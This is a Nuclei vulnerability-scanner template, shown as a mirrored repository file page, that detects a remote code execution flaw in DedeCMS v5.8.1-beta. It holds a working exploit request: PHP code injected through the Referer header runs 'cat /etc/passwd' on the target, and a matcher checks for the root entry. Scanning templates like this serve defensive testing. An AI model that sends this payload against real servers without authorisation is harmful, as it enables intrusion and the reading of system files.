daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/dedecms/dedecms-rce.yaml

33 lines
987 B
YAML
Raw Normal View History

Create dedecms-rce.yaml
2022-07-21 08:22:11 +00:00
id: dedecms-rce
info:
name: DedeCMS v5.8.1-beta - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
The vulnerability is due to a variable override vulnerability in DedeCMS that allows an attacker to construct malicious code with template file inclusion without authorization to cause remote command execution attacks and ultimately gain the highest privileges on the server.
reference:
- https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
- https://sectime.top/post/1d114771.html
metadata:
verified: true
Update dedecms-rce.yaml
2022-07-21 08:32:18 +00:00
fofa-query: app="DedeCMS"
Create dedecms-rce.yaml
2022-07-21 08:22:11 +00:00
tags: dedecms,cms,rce
requests:
- raw:
- |
GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Referer: <?php "system"($c);die;/*ref
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200